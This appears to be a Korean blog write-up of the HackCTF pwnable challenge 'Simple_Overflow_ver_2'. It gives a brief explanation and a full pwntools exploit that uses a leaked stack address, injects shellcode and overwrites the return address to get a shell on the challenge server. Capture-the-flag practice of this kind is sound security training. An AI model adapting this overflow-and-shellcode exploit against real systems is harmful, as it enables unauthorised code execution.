본문 바로가기

HackCTF/pwnable

HackCTF - Simple_Overflow_ver_2

 

뭔가 많아 보이지 달라진 건 없다

 

이전과 마찬가지로 스택 주소를 출력해주니

 

쉘코드+더미+스택주소를 넣으면 된다

 

from pwn import *

r = remote('ctf.j0n9hyun.xyz', 3006)
e = ELF('Simple_overflow_ver_2')
context.arch = 'i386'

shellcode = asm(shellcraft.i386.linux.sh())

r.sendlineafter('Data :', 'AAAA')
r.recv(1)
stack = int(r.recv(10), 16)

r.sendlineafter('(y/n): ', 'y')

payload = shellcode
payload += 'A'*(140-len(shellcode))
payload += p32(stack)

r.sendline(payload)

r.interactive()

'HackCTF > pwnable' 카테고리의 다른 글

HackCTF - BOF_PIE  (0) 2021.11.21
HackCTF - Offset  (0) 2021.11.21
HackCTF - x64 Simple_size_BOF  (0) 2021.11.21
HackCTF - x64 Buffer Overflow  (0) 2021.11.21
HackCTF - 내 버퍼가 흘러넘친다!!!  (0) 2021.11.20